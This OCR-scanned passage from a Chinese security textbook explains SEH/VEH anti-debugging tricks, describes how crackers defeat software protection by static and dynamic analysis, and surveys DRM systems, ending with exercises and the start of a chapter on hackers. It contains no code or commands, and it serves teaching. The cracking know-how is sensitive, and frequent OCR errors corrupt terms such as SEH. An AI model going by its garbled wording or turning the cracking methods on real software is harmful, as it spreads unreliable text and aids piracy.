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程 异常 处 理 过 程 或 调试 器 处 理 掉 , 最 终 均 要 交 由 顶层 异常 回调 函数 处 理 。 

SEH 的 处 理 过 程 如 下 : 当 一 个 应 用 程序 发 生 错 误 时 ,系统 首先 判断 异常 是 否 应 该 由 调 
试 器 处 理 ,如 果 是 , 则 系统 挂 起 程序 ,将 异常 信息 发 送 给 调试 器 处 理 ; 如 果 调 试 器 未 能 处 理 ， 
则 遍历 查找 与 线程 相关 的 SEH 异常 处 理 例 程 并 调用 合适 的 ;如 果 仍 未 处 理 , 且 程 序 处 于 被 
调试 状态 , 则 操作 系统 再 次 挂 起 程序 通知 调试 器 处 理 ; 如 果 程 序 不 处 于 被 调试 状态 或 者 调试 
器 仍 未 能够 处 理 , 则 遍历 查找 与 进程 相关 的 SEH 异常 处 理 例 程 并 调用 ;如 果 仍 不 能 处 理 这 
个 异常 , 则 调用 默认 的 系统 异常 处 理 程序 ;如 果 还 是 处 理 不 了 异常 ,系统 就 调用 ExitProcess 
终结 程序 ,并 最 后 清理 相关 SHE 例 程 未 释放 资源 。 

结构 化 异常 处 理 是 用 EXCEPTION_RETGISTRATION 结构 链 起 来 的 异常 处 理 系 统 ， 
当 蜡 常 发 生 时 系统 会 遍历 这 个 链 ,依次 询问 是 否 接受 该 异常 处 理 。SEH 的 缺点 就 是 最 后 安 
装 的 SEH 处 理 例 程 总 是 优先 得 到 控制 权 , 当 然 Final 型 的 或 称 top 型 的 例外 ,因为 它 是 不 允 
许 嵌 套 的 。 大 多 数 C/C++ 代码 都 用 _try{) _except{ } 块 来 保证 其 正确 运行 ,而 这 些 异 常 处 理 
例 程 是 在 注册 的 保护 加 密 例 程 之 后 安装 的 ,因而 也 就 在 链 的 前 面 。 首 先是 C/C++ 编译 器 本 
身 提 供 的 处 理 例 程 来 处 理 ,而 不 能 用 自己 安装 的 处 理 句柄 来 解密 代码 段 继续 执行 。 

2) 向 量化 异常 处 理 

Windows XP/2003 提供 一 种 向 量化 异常 处 理 , 它 用 类 似 于 SEH 的 api 注册 ,也 是 一 个 
链 状 结构 。 与 SEH 不 同 的 是 ,添加 的 异常 处 理 句柄 可 以 吝 套 而 不 是 只 能 指定 一 个 ;而 且 可 
以 指定 用 户 的 异常 处 理 句柄 是 否 在 链 的 最 前 面 ,如 果 后 面 调用 有 同样 的 指定 就 依次 排 在 后 
面 。 若 所 有 的 都 不 处 理 异常 ,最 后 系统 终结 程序 ,仍然 要 进行 堆栈 展开 ,释放 资源 。SHE 由 
栈 来 管理 ,而 VEH 由 堆 来 管理 。 

XP 仍然 支持 SEH ,异常 处 理 的 优先 控制 权 顺序 是 debuger>VEH->SEH->~ debugger~ 系 
统 。 在 VEH 回调 处 理 例 程 中 必须 保护 好 寄存 器 ,否则 会 引起 其 他 异常 。 

3) 利用 异常 处 理 防范 跟踪 技术 

(1) 利用 SEH 防 BPX 断 点 。 针 对 利用 BPX 断 点 (地 址 断 点 ) 进 行 跟踪 的 特点 ,可 以 利 
用 SEH 技术 防范 在 API 函数 内 部 的 多 处 地 址 设置 断 点 ,实现 反 跟踪 。 

首先 需要 在 SEH 链表 中 加 入 结 点 ,以 实现 当 异 常 发 生 的 时 候 系统 会 调用 异常 处 理 函 
数 ;然后 通过 INT 3 指令 故意 产生 一 个 异常 ,让 系统 转 入 自己 的 异常 处 理 函 数 。 

(2) 利用 SEH 防 BPM 硬件 断 点 。BPM 断 点 是 用 来 跟踪 内 存 数据 的 ,通常 要 利用 
DR0 一 DR3 调试 寄存 器 来 工作 ,其 反 跟 踪 工 作 原 理 是 利用 调试 寄存 器 最 多 可 以 设置 4 个 
断 点 ,在 SEH 异常 处 理 函 数 中 对 程序 中 的 地 址 设置 4 个 断 点 ,设置 一 个 初始 值 为 4 的 计 
数 器 ,每 产生 一 个 异常 就 减 1。 异 常 处 理 时 调用 该 处 理 函数 ,接着 让 程序 恢复 执行 ,正常 
情况 下 计数 器 应 该 为 0, 否则 说 明 跟 踪 者 在 程序 的 4 个 断 点 之 间 的 执行 中 使 用 了 BPM 
断 点 。 

(3) 利用 VEH 全 局 指针 加 密 保 护 堆 溢 出 。XP 的 SP2 对 全 局 性 的 指针 都 做 了 编码 处 
理 ,以 防止 动态 跟踪 。 如 映射 给 PEB 管理 结构 的 起 始 地 址 做 了 随机 处 理 ; 对 TOP SEH 的 
保护 利用 kernel32. dll 导出 函数 设置 一 个 筛选 器 异常 处 理 回调 函数 ,并 将 操作 的 结果 送 到 
系统 默认 的 异常 处 理 程序 ;利用 ntdll. dll 导出 的 加 解密 函数 对 全 局 指针 进行 加 密 处 理 ( 指 
针 与 随机 数 异 或 )。 回 调 函 数 的 地 址 都 是 直接 写 和 人 到 全 局 变量 中 ,VEH 指针 在 使 用 前 必须 
解码 ,因此 指针 加 密 可 以 防止 覆盖 该 函数 指针 来 利用 堆 溢 出 。 
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10. 其 他 方法 
其 他 还 有 对 程序 段 进行 CRC 校 验 ;设置 大 循环 、 废 指令 (不 易 识破 、 大 量 中 断 、 不 能 跳 
过 ) 迷 惑 、 拖 垮 解密 者 ;混合 编程 法 ; 自 编 软 中 断 INT 13 等 方法 和 技术 。 


7.5 数字 版 权 管 理 


随 着 所 有 媒体 的 数字 化 ,数字 文档 数字 图 像 .音频 和 视频 等 多 媒体 数字 产品 逐渐 成 为 
人 们 数字 生活 的 主要 内 容 , 盗 版 复制 等 损害 著作 人 利益 的 现象 屡见不鲜 。 因 此 ,如 何 实施 
有 效 的 数字 媒体 内 容 版 权 保护 就 成 了 一 个 迫切 需要 解决 的 问题 。 一 般 对 机 密 文 档 数据 采用 
数字 水 印 ,内容 加 密 或 存储 介质 加 密 的 办 法 ,对 多 媒体 数字 产品 采用 数字 水 印 来 宣示 自己 的 
版 权 .用 数字 版 权 管理 (Digital Rights Management,DRM) 与 法 律 约束 等 办 法 进行 保护 。 

1. 数字 版 权 管 理 概念 

全 球 著名 的 国际 数据 信息 中 心 (Data Information Center,DIC) 对 数字 版 权 管理 的 定义 
是 : 结合 硬件 和 软件 的 存 取 机 制 , 对 数字 化 信息 内 容 在 其 生存 周期 内 的 存 取 进行 控制 。 它 
包含 了 版 权 使 用 的 描述 .识别 .交易 监控 ,对 使 用 在 有 形 和 无 形 资产 上 的 各 种 权限 的 跟踪 和 
对 版 权 所 有 人 的 关系 管理 等 内 容 。 

DRM 的 核心 就 是 通过 安全 和 加 密 技术 锁定 和 限制 数字 内 容 及 其 分 发 途径 ,从 而 达到 
防范 对 数字 产品 无 授权 复制 和 使 用 的 基本 目标 。 

DRM 能 限制 用 户 使 用 数字 内 容 , 是 一 项 涉及 技术 、 法 律 和 商业 各 个 层面 的 系统 工程 ， 
它 为 数字 媒体 的 商业 运作 提供 了 一 套 完 整 的 实现 手段 。DRM 不 仅仅 指 版 权 保护 ,同时 也 
提供 了 数字 媒体 内 容 的 传输 ,管理 和 发 行 等 一 套 完整 的 解决 方案 。 

DRM 方案 经 常用 于 数字 媒体 ,根本 目的 是 保护 版 权 人 的 版 权 和 商业 利益 。 如 DVD、 下 
载 的 音乐 和 许可 的 软件 ,DRM 的 可 能 操作 限制 包括 播放 次 数 、 播 放 浏览 时 间 、 复 制 或 刻录 
到 其 他 设备 和 媒体 .出 售 与 转借 等 限制 。 

DRM 技术 的 出 现 , 使 得 版 权 所 有 者 不 用 再 耗费 大 量 时 间 和 精力 与 客户 进行 谈判 ,确保 
数字 媒体 内 容 能 够 被 合法 地 使 用 。DRM 使 内 容 提 供 商 通过 因特网 . 流 媒 体 、 交 互 数字 电视 
等 平台 ,提供 更 多 的 内 容 , 采 取 更 灵活 的 节目 销售 方式 ,同时 有 效 地 保护 知识 产权 。 

在 实际 应 用 中 遇 到 的 硬件 狗 、 软 件 许可 证 .序列 号 和 机 项 盒 等 都 属于 DRM 的 范畴 。 

2. 数字 版 权 管理 功能 

DRM 技术 提供 的 功能 是 控制 和 管理 对 数字 化 信息 作品 的 接触 访问 和 使 用 ,防止 非法 
入 侵 和 复制 , 自 改 以 及 传播 的 行为 ,保证 付费 用 户 取 得 合法 授权 后 在 被 授予 的 权限 范围 内 按 
照 使 用 规则 自由 地 使 用 数字 信息 内 容 。 主 要 功能 有 : 

(1) 内 容 保 护 。 主 要 是 通过 加 密 技术 来 实现 ,以 防止 非 授 权 的 访问 。 

(2) 完整 性 保护 。 通 常 使 用 数字 签名 技术 或 数字 水 印 技术 ,防止 原作 品 遭 到 算 改 。 

(3) 身份 认证 。 身 份 认证 是 PKI 体制 提供 的 一 项 关键 服务 ,主要 通过 可 信赖 的 CA 认 
证 机 构 签 发 数字 证 书 来 实现 。 

(4) 安全 传输 。 可 以 通过 加 密 信道 来 实现 ,目前 主要 有 SSL 与 IPSec, 它 们 都 可 以 用 来 
建立 安全 的 虚拟 专 网 (VPN)。 如 果 数 字 内 容 本 身 已 经 可 靠 地 加 密 , 则 可 在 公开 信道 上 
传输 。 
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(5) 权限 管理 。 目 前 主流 的 实现 手段 是 采用 数字 权利 表达 语言 (DREL), 如 ODRL、 
XrML 等 来 对 与 数字 资源 相关 的 权利 进行 定义 。 这 是 DRM 技术 的 核心 。 

(6) 安全 支付 。 当 前 电子 商务 支付 平台 主要 基于 SSL 或 者 SET。SSL 内 能 于 浏览 器 
中 ,应 用 较 早 ,但 只 涉及 C/S 双方 的 认证 。SET 在 SSL 的 基础 上 进行 了 改进 ,可 以 包含 多 
方 认证 机 制 ,同时 提供 对 交易 各 方 隐私 信息 的 保护 。 

(7) 内 容 发 现 。 读 者 的 随意 浏览 对 其 决定 是 否 购买 该 内 容 起 着 重要 的 作用 。 通 过 描述 
性 元 数据 标识 数字 内 容 的 标题 ,作者 ,关键 词 出 版 机 构 和 摘要 等 特征 事项 ,并 通过 支持 有 限 
预览 功能 向 用 户 提 供 一 定 的 内 容 发 现 机 制 。 

3. 数字 版 权 管理 体系 结构 

DRM 系统 一 般 包 括 三 个 方面 : 内 容 准备 .内 容 管理 和 内 容 使 用 。 另 外 ,通常 与 某 个 电 
子 商务 系统 结合 来 进行 支付 管理 。 内 容 准备 包括 数字 媒体 的 准备 和 版 权 的 定义 ,内 容 管理 
包括 内 容 的 发 布 和 版 权 的 交易 ,内 容 使 用 涉及 管理 交易 后 的 内 容 如 何 使 用 和 跟踪 使 用 过 程 。 

典型 的 DRM 系统 通常 采用 许可 证 方式 实现 ,一 般 包 含 4 个 基本 元 素 ( 实 体 ): 内 容 提 供 
商 (Content Provider) ,发 行商 (Distributor) 、 票 据 交 易 中 心 (Clearing House) 和 消费 者 
(Consumer) ,如 图 7.7 所 示 。 


Clearing 
House 
Request & ,7 Digital 
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Usage | Requiring、 
> SK, 
Content Rules | Lisense Ca 
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1 
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Protected 和 Protected 
Content Distributor Content 


图 7.7 典型 的 DRM 体系 结构 


内 容 提 供 商 拥有 内 容 的 数字 权 , 对 原创 人 员 ( 如 作家 、 作 曲 家 、 摄 影 师 和 图 像 制作 者 等 ) 
创作 的 文字 音频、 视频 和 图 像 等 数字 媒体 文件 进行 编码 ,形成 DRM 软件 支持 的 媒体 格式 
文件 。 利 用 水 印 技术 特殊 使 用 规则 ,许可 密 钥 等 对 文件 内 容 进 行 处 理 ,并 和 相应 的 版 权 等 
信息 打包 成 被 保护 的 文件 ,存放 在 服务 器 或 CD .DVD 等 物理 媒体 上 发 布 。 

发 行商 为 打包 的 数字 内 容 提 供 发 布 通道 ,如 在 线 商 店 或 数字 零售 站 点 。 发 行商 接收 来 
自 内 容 提 供 商 的 数字 内 容 和 权限 元 数据 。 

消费 者 通过 发 布 通道 获取 数字 内 容 , 并 支付 数字 许可 证 的 费用 。 数 字 许可 证 用 来 说 明 
消费 者 对 内 容 的 使 用 权 。 通 常 一 个 DRM 系统 需要 消费 者 安装 特殊 的 阅读 器 (或 播放 器 ) 软 
件 , 用 来 初始 化 许可 请 求 和 执行 内 容 使 用 权限 。 

票据 交易 中 心 负责 处 理发 布 许可 证 给 消费 者 的 金融 交易 ,给 内 容 提 供 商 支付 版 费 ,给 发 
行商 支付 发 布 费用 。 另 外 ,还 负责 为 每 一 个 消费 者 登记 许可 证 的 消费 情况 。 

通常 情况 下 ,DRM 系统 还 包括 零售 门户 网 站 。 零 售 门户 网 站 直接 面向 用 户 ,作为 用 户 
和 分 发 服务 器 \ 版 权 服务 器 和 (人 金融) 清算 中 心 的 桥梁 ,用 户 只 直接 与 门户 网 站 交互 。 

典型 数字 版 权 管理 系统 的 一 般 工 作 流程 如 下 : 
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(1) 内 容 提供 过 程 。 由 内 容 所 有 者 或 内 容 供 应 商 提 供 的 内 容 文件 ( 需 数 字 化 ) 来 源 。 

(2) 内 容 包 装 过 程 。 对 内 容 文件 的 压缩 和 加 密 处 理 。 压 缩 尽 可 能 减 小 媒体 内 容 文 件 的 
容量 ,加 密 采 用 国际 公认 的 加 密 算法 。 还 需要 加 入 一 些 相关 信息 ,如 文件 的 标题 .艺术 家 的 
姓名 版 权 声明 图像. 可 获取 许可 证 的 URL 等 附加 信息 。 

(3) 内 容 发 布 过 程 。 由 于 包装 好 的 内 容 文件 与 授权 使 用 它 的 许可 证 是 分 开 的 ,因此 包 
装 后 的 媒体 文件 有 多 种 发 布 方式 。 例 如 可 以 将 文件 放 在 Web 站 点 上 提供 在 线 点 播 或 下 载 
服务 ;以 CD、VCD 和 DVD 等 形式 进行 发 布 ;以 电子 邮件 方式 发 送 给 家 人 、 朋 友和 客户 等 。 
另外 ,用 户 也 可 以 共享 和 复制 打包 的 媒体 内 容 文件 。 

(4) 获取 内 容 使 用 许可 证 过 程 。 用 户 必 须 获 得 授权 使 用 许可 证 才能 使 用 包装 后 的 媒体 
内 容 文件 。 使 用 许可 证 中 包含 的 密 钥 信 息 可 以 解密 内 容 以 供 查看 。 每 个 许可 证 中 包含 不 同 
的 使 用 权限 以 及 由 内 容 提供 商 规定 使 用 的 商业 规则 ,如 起 止 时 间 限 制 , 播 放 次 数 限制 无 限 
制 播放 规则 、 先 试 后 买 规 则 以 及 促销 预览 规则 等 。 许 可 证 可 以 被 捆绑 在 客户 端的 计算 机 上 ， 
能 影响 或 限制 内 容 文件 的 使 用 ,并 且 不 能 被 共享 。 

(5) 内 容 使 用 过 程 。 当 用 户 第 一 次 使 用 包装 后 的 内 容 文件 时 ,阅读 器 或 播放 器 会 自动 
启动 许可 证 的 检测 过 程 。 如 果 检测 不 到 它 的 授权 使 用 许可 证 ,用 户 计算 机 的 Web 浏览 器 就 
会 打开 此 内 容 文件 的 许可 证 授权 服务 中 心 的 注册 网 页 ,提示 客户 输入 内 容 提供 商事 先 规定 
的 用 户 注册 信息 ,验证 通过 就 可 以 颁发 授权 使 用 许可 证 。 当 获取 到 有 效 的 授权 使 用 许可 证 
后 ,用 户 可 以 根据 许可 证 中 授权 的 使 用 规则 与 权限 使 用 该 文件 。 

4. 数字 版 权 管理 技术 

任何 DRM 系统 都 包括 三 个 基本 要 素 一 一 加 密 的 内 容 、 授 权 和 内 容 密 钥 。DRM 的 基本 
原理 就 是 通过 对 数字 媒体 内 容 进行 加 密 ,然后 通过 安全 的 技术 手段 把 解密 密 钥 及 加 密 后 的 
媒体 文件 传送 给 正确 的 用 户 终端 。 为 了 对 多 样 化 的 业务 提供 计 费 及 管理 的 支持 ,DRM 增 
加 了 授权 环节 ,用 户 终端 需要 获得 授权 才能 使 用 解密 密 钥 进行 解密 后 使 用 。 

DRM 技术 可 以 对 数字 作品 像 传 统 纸 质 书籍 一 样 计数 ( 按 “ 本 ”或 阅读 次 数 计 费 ) ,并且 
限制 其 二 次 分 发 和 转 售 ,其 实质 是 提供 了 一 种 数字 作品 的 计 费 使 用 系统 。DRM 系统 通常 
包含 加 密 和 密 钥 管 理 .访问 控制 .拷贝 控制 .身份 认证 .跟踪 和 计 费 机 制 等 。DRM 所 依靠 的 
主要 技术 有 密码 技术 .数字 水 印 技术 和 使 用 控制 技术 。 

(1) 密码 技术 。 通 过 对 数字 内 容 进行 加 密封 装 ,使 非 授权 用 户 不 能 随意 接触 访问 相关 
内 容 。 只 有 合法 授权 用 户 获取 正确 的 密 钥 与 解密 算法 对 数字 内 容 解密 后 才能 正常 阅读 和 使 
用 。 而 且 密 钥 是 与 使 用 者 的 硬件 信息 绑 定 的 ,数据 内 容 只 能 在 指定 的 计算 机 上 访问 ,可 以 防 
止 非法 复制 和 二 次 分 发 传播 ,是 当前 较 普遍 使 用 的 一 种 技术 手段 。 

一 种 简单 的 DRM 方案 是 对 媒体 内 容 加 密 , 并 将 解密 密 钥 存 储 到 授权 播放 器 中 。 每 个 
媒体 文件 通常 都 使 用 不 同 的 密 钥 进行 加 密 , 因 此 特定 媒体 对 象 的 密 钥 被 破解 并 不 影响 其 他 
媒体 对 象 。 作 为 一 种 附加 防御 ,对 每 个 许可 播放 器 也 可 以 使 用 不 同 的 加 密 密 钥 。 其 步骤 
如 下 : 

@ 媒体 服务 器 向 播放 器 发 送 加 密 的 媒体 文件 和 使 用 播放 器 密 钥 加 密 的 文件 密 钥 。 

@ 播放 器 先 用 播放 器 密 钥 解密 文件 密 钥 ,然后 使 用 文件 密 钥 解密 媒体 文件 。 

@ 播放 解密 后 的 媒体 文件 。 

该 方案 具有 如 下 的 特点 : 
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@ 加 密 的 媒体 文件 只 能 在 下 载 它 的 播放 器 上 播放 。 其 他 播放 器 无 法 解密 文件 密 钥 ,就 
无 法 解密 媒体 文件 。 

@ 如 果 攻 击 者 得 到 文件 密 钥 下 ,也 不 能 用 该 文件 密 钥 去 解密 其 他 媒体 文件 。 

@ 如 果 攻 击 者 得 到 播放 器 密 钥 P, 他 只 能 解密 该 播放 器 下 载 的 媒体 文件 。 

系统 的 安全 要 求 使 用 强 密码 系统 和 强 密 钥 ,播放 器 不 能 泄露 播放 器 密 钥 (P) 文件 密 钥 
(CEF) 或 未 加 密 的 媒体 文件 (M) 。 但 软件 播放 器 中 易 受 到 逆向 工程 攻击 ,或 者 通过 嗅 探 得 到 
播放 器 密 钥 ,媒体 文件 的 密 钥 管理 复杂 。 

(2) 数字 水 印 技术 。 在 数字 媒体 作品 中 嵌入 包含 有 作者 、 版 权 或 产品 序列 号 等 信息 的 
数字 水 印 ,不 影响 数字 内 容 的 正常 使 用 ,可 以 鉴别 版 权 信息 的 真 伪 , 提 供 版 权 所 有 者 的 权 属 
证 明 , 弥 补 了 加 密 技 术 事后 控制 能 力 不 足 的 弱点 。 

(3) 使 用 控制 技术 。 在 用 户 获 得 数字 内 容 及 其 许可 后 ,如 何 按照 授予 的 使 用 权限 控制 
数字 内 容 的 使 用 是 DRM 系统 的 关键 。 现 有 使 用 控制 的 方法 主要 是 用 户 控制 和 权限 控制 ， 
由 传统 的 访问 控制 技术 不 断 优化 发 展 而 来 ,确保 只 有 合法 用 户 才能 在 被 许可 的 权限 范围 内 
使 用 数字 内 容 。 现 代 使 用 控制 模型 克服 了 传统 访问 控制 模型 静态 和 封闭 式 的 数据 保护 方 
式 , 能 对 数字 版 权 实 施主 动 ,动态 和 连续 的 使 用 控制 管理 ,是 一 套 能 满足 绝 大 部 分 权限 控制 
需求 的 权限 控制 管理 技术 ,也 是 近年 来 信息 安全 领域 的 研究 热点 技术 。 

5s. 数字 版 权 管理 应 用 

DRM 技术 最 初 用 于 软件 保护 和 防止 数字 音 视 频 盗版 方面 ,由 于 该 技术 的 有 效 性 和 洪 
在 的 巨大 商业 利益 ,其 应 用 领域 越 来 越 广 ,现今 已 在 计算 机 软件 .PC 视频 点 播 .IPTV 音频 
和 视频 下 载 . 电 子 图 书 .数据 库 .数字 图 书馆 、 数 字 图 像 、 移 动 通信 增值 业务 (3G 手机 内 容 ) 
等 领域 开启 了 数字 作品 新 的 商业 利用 模式 。 

DRM 的 一 个 常见 应 用 是 防止 未 授权 的 复制 和 无 授权 设备 播放 数字 媒体 内 容 。 但 是 
DRM 对 于 数字 版 权 进行 限制 也 存在 着 争议 ,有 些 DRM 方案 超越 了 版 权 法 提供 的 保护 , 影 
响 了 人 们 对 数字 内 容 的 合法 使 用 。 直 到 最 近 ,数字 版 权 管理 技术 的 实现 还 不 是 很 成 功 。 

2002 年 ,一 些 音乐 CD 开始 采用 DRM 方案 ,防止 将 CD 内 容 复制 到 硬盘 驱动 器 或 其 他 
外 部 媒体 中 。 兼 容 性 问题 使 客户 无 法 在 某 些 设备 上 播放 自己 合法 购买 的 音乐 ,许多 方案 被 
逆向 工程 ,最 终 失效 。2005 年 ,DRM 软件 行为 类 似 于 Rootkit ,隐藏 它 的 文件 和 进程 ,其 实 
现成 本 和 弱点 产生 争议 ,大 的 音乐 出 版 商 目前 都 没有 使 用 DRM 保护 CD。 

相反 ,几乎 所 有 商业 生产 的 DVD 都 使 用 DRM 的 内 容 扰乱 系统 (Content Scramble 
System,CSS) 。CSS 的 安全 目标 包括 只 有 授权 的 DVD 播放 机 才 包含 解密 CSS 加 密 磁盘 所 
必需 的 播放 器 密 钥 ; 对 播放 器 和 主机 之 间 的 通信 进行 加 密 , 防 止 在 传输 中 窃听 数据 。CSS 
不 久 便 被 破解 。 蓝 光 DVD 依赖 于 高 级 访问 内 容 系 统 (Advanced Access Content System， 
AACS) , 它 基 于 强大 的 AES 分 组 密码 ,将 多 个 密 钥 存 储 到 每 个 播放 器 中 ,并 采用 复杂 的 机 
制 来 撤销 播放 器 密 钥 。 其 改进 版 在 授权 播放 器 中 骨 入 了 小 的 虚拟 机 ,将 蓝光 内 容 作 为 可 执 
行 的 程序 ,由 播放 器 对 其 进行 验证 和 执行 。 
苹果 的 iTunes 音乐 播放 器 允许 用 户 通 过 iTunes 商店 下 载 单 曲 或 专辑 ,使 用 FairPlay 
对 其 进行 编码 ,DRM 技术 对 每 个 轨道 进行 加 密 , 以 便 只 有 下 载 文件 的 用 户 能 聆听 这 些 歌 
曲 。 通 过 iTunes 下 载 的 电影 苹果 公司 的 DRM 使 用 订购 模式 ,限制 客户 对 数字 视频 的 下 载 
和 观看 时 间 。 
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最 近 出 现 的 手持 文件 阅读 器 ( 像 亚马逊 的 Kindle、 苹 果 的 iPad、Barnes 和 Noble Nook 
及 索尼 的 电子 阅读 器 ) 是 一 种 电子 图 书 (Ebook) 的 概念 。 电 子 书籍 的 DRM 技术 使 用 方式 
类 似 于 下 载 音乐 和 视频 的 DRM。 在 某 些 情况 下 ,甚至 可 以 修改 购买 的 电子 书籍 的 阅读 
版 权 。 

Windows 媒体 DRM 技术 的 工作 原理 是 : 首先 建立 数字 媒体 授权 中 心 ,编码 已 压缩 的 
数字 节目 内 容 , 然 后 利用 密 钥 对 内 容 进 行 加 密 保护 ,加 密 的 媒体 头 部 存放 着 KeyID 和 节目 
授权 中 心 的 统一 资源 定位 器 (URL) 地 址 。 用 户 点 播 媒 体 时 ,根据 媒体 头 部 的 KeyID 和 
URL 信息 ,通过 数字 媒体 授权 中 心 的 验证 授权 后 送出 相关 的 密 钥 解密 ,之 后 媒体 方 可 播放 。 
需要 保护 的 节目 是 经 过 加 密 的 ,即使 被 用 户 下 载 保存 并 散播 给 他 人 ,没有 得 到 数字 媒体 授权 
中 心 的 验证 授权 也 无 法 播放 ,从 而 严密 地 保护 了 节目 的 版 权 。 


本 章 小 结 


软件 保护 就 是 既 要 从 法 律 上 保护 计算 机 软件 著作 权 人 的 权益 和 知识 产权 ,调整 计算 机 
软件 在 开发 ,传播 和 使 用 中 发 生 的 利益 关系 ,鼓励 计算 机 软件 的 开发 与 合法 使 用 ;又 要 从 技 
术 上 防止 软件 的 非法 复制 .盗版 和 非法 使 用 。 

软件 保护 技术 就 是 要 防止 对 程序 的 非法 执行 ,非法 拷贝 .非法 修改 .静态 分 析 动态 分 析 
以 及 逆向 工程 。 可 分 为 软 保护 和 硬 保护 。 软 保护 方法 和 技术 有 序列 号 保护 、 时 间 限 制 ,程序 
功能 限制 .Key File 保护 软件 加 过、 程序 结构 化 异常 花 指令 ,数字 证 书 、 补 丁 、 激 活 等 。 硬 
保护 方式 有 软盘 ( 密 钥 盘 ) 保 护 方式 ,加密 卡 、UsbKey ,软件 狗 和 光盘 加 密 等 。 实 际 保护 是 这 
些 技术 的 综合 运用 。 

理论 上 任何 软件 只 要 能 完整 运行 所 有 功能 一 次 即 可 破解 。 破 解 技 术 包括 静态 分 析 、 动 
态 跟踪 以 及 逆向 工程 等 。 当 前 Cracker 主要 使 用 静态 分 析 和 动态 跟踪 的 方法 来 破解 软件 ， 
而 壳 几 乎 是 软件 保护 和 破解 的 主要 焦点 。 

静态 分 析 即 阅读 软件 使 用 说 明和 反 汇编 出 来 的 程序 清单 ,从 提示 信息 入 手 进行 分 析 跟 
踪 数 据 变化 过 程 和 控制 过 程 ,对 代码 有 一 个 初步 认识 。 

静态 分 析 破 解 就 是 通过 对 软件 的 静态 分 析 查 找 注册 或 验证 身份 的 代码 和 断 点 ,对 代码 
进行 适当 修改 来 破解 被 保护 的 软件 。 

动态 分 析 是 利用 SOFTICE 或 TRW2000 等 工具 动态 跟踪 程序 软件 的 执行 过 程 ,包括 
单 步 执 行 或 分 段 执 行程 序 ,查找 注册 或 验证 身份 的 代码 和 断 点 ,从 而 分 析 程 序 流程 和 保护 结 
构 , 找 出 正确 的 注册 码 ,使 破解 软件 成 为 功能 正常 的 注册 软件 。 

软件 逆向 工程 是 指 从 可 运行 的 程序 系统 出 发 ,运用 反 汇 编 ,系统 分 析 和 程序 理解 等 多 种 
计算 机 技术 ,对 软件 的 结构 ,流程 ,算法 .代码 等 进行 逆向 拆 解 和 分 析 ,推导 出 软件 产品 的 源 
代码 ,设计 原理 .结构 算法、 处 理 过 程 、 运 行 方法 及 相关 文档 等 。 

程序 运行 时 的 保护 一 般 利用 反 跟 踪 技 术 。 常 用 的 反 跟踪 技术 有 抑制 中 断 、 封 锁 键盘 、 封 
锁 显 示 、 检 测 跟踪 \ 修 改 向 量 表 、 堆 栈 指 针 、 指 令 流 队列 、 逆 指令 流 和 异常 处 理 等 。 

数字 版 权 管理 (DRM) 是 结合 硬件 和 软件 的 存 取 机 制 , 对 数字 化 信息 内 容 在 其 生存 周期 
内 的 存 取 进 行 控制 。 它 包含 了 版 权 使 用 的 描述 、 识 别 、 交 易 监控 ,对 使 用 在 有 形 和 无 形 资产 
上 的 各 种 权限 的 跟踪 和 对 版 权 所 有 人 的 关系 管理 等 内 容 。 
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习 题 7 


什么 是 软件 保护 ? 软件 保护 的 技术 目的 是 什么 ?常见 的 软件 保护 技术 有 哪些 ? 

试 述 软件 的 激活 保护 过 程 ,可 以 改进 吗 ? 

什么 是 软件 的 壳 ? 脱 壳 步 又 是 什么 ? 

简 述 PE 文件 的 结构 ,并 说 明 输入 表 和 输出 表 的 作用 。 

试 述 静 态 分 析 破 解 和 动态 分 析 破解 的 一 般 步 又 。 如 何 保证 自己 的 软件 理论 上 不 被 
破解 ? 

反动 态 跟踪 有 哪些 技术 ? 

什么 是 软件 逆向 工程 ? 试 自选 一 软件 进行 逆向 。 

什么 是 数字 版 权 管理 ? 试 设 计 一 个 自己 的 DRM 方案 。 


第 8 章 黑 客 
8.1 黑客 概述 


自从 20 世纪 90 年 代 以 来 ,几乎 每 一 个 计算 机 信息 系统 都 是 在 网 络 环境 下 运行 的 。 在 
网 络 环境 下 工作 的 计算 机 ,除了 经 常 要 受到 病毒 等 恶意 程序 的 侵害 外 ,还 要 受到 黑客 的 攻 
击 。 黑 客 威胁 的 手段 从 嗅 探 ,扫描 、 拒 绝 服务 攻击 到 木马 病毒 融合 .钓鱼 网 站 .垃圾 邮件 等 ， 
各 种 方法 综合 使 用 。 本 章 介绍 一 些 黑客 的 主要 攻击 手段 。 


8.1.1 黑客 概念 


1. 黑客 定义 

黑客 (Hacker) , 源 于 英语 动词 hack, 意 为 “ 臂 , 砍 ”, 引 申 为 干 了 一 件 非常 漂亮 的 工作 ”。 
在 早期 麻 省 理工 学 院 的 校园 但 语 中 ,黑客 " 则 有 ”恶作剧 ?之 意 , 尤 指 手法 巧妙 、 技 术 高 明 的 
恶作剧 。 在 日 本 (新 黑客 词典 ) 中 对 黑客 的 定义 是 “喜欢 探索 软件 程序 奥秘 ,并 从 中 增长 了 其 
个 人 才干 的 人 。 他 们 不 像 绝 大 多 数 计算 机 使 用 者 那样 ,只 规 规矩 矩 地 了 解 别人 指定 了 解 的 
狭小 部 分 知识 ”。 

一 般 认 为 , “黑客 "是 一 个 精通 计算 机 技术 的 特殊 群体 。 可 以 把 “黑客 ”分 为 三 类 : 一 类 
称 为 “破解 者 (Crackers)”, 他 们 试图 破解 某 系统 或 网 络 以 免费 使 用 软件 和 数据 ,或 提醒 该 系 
统 所 有 者 的 系统 安全 漏洞 ;一 类 称 为 “ 骇 客 (Hackers)”, 他 们 利用 计算 机 技术 玩 一 些 不 负责 
的 恶作剧 ;一 类 称 为 "和 人 侵 者 (Intruder)”, 他 们 是 有 目的 的 破坏 者 ,恶意 ,非法 地 试图 入 侵 系 
统 以 获取 敏感 数据 或 破坏 某 个 程序 .系统 及 网 络 的 安全 。 

2. 威胁 的 动机 和 行为 

黑客 攻击 的 动机 包括 攻击 者 贪心 ,进行 偷 窍 或 者 敲诈 财物 ;无 聊 的 恶作剧 ;显露 其 计算 
机 经 验 与 才智 ,以 便 证 明 其 能 力 ,获得 名 气 ; 因 解雇 、 受 批评 或 者 被 降级 ,或 者 认为 不 公平 的 
待遇 和 宿 怨 而 进行 报复 ;政治 上 敌对 ,破坏 国家 或 集团 利益 ;国家 、 民 族 或 个 人 的 仇恨 原因 ， 
从 事 政治 .军事 和 商业 目的 的 间谍 工作 ;商业 竞争 等 。 

黑客 行为 包括 寻找 系统 漏洞 获取 口令 、 账 号 攻击 、 放 置 木马 、Web 欺骗 .电子 邮件 攻 
击 、 网 络 节 点 攻击 、 网 络 监听 和 偷 取 特 权 等 。 

3. 黑客 守则 
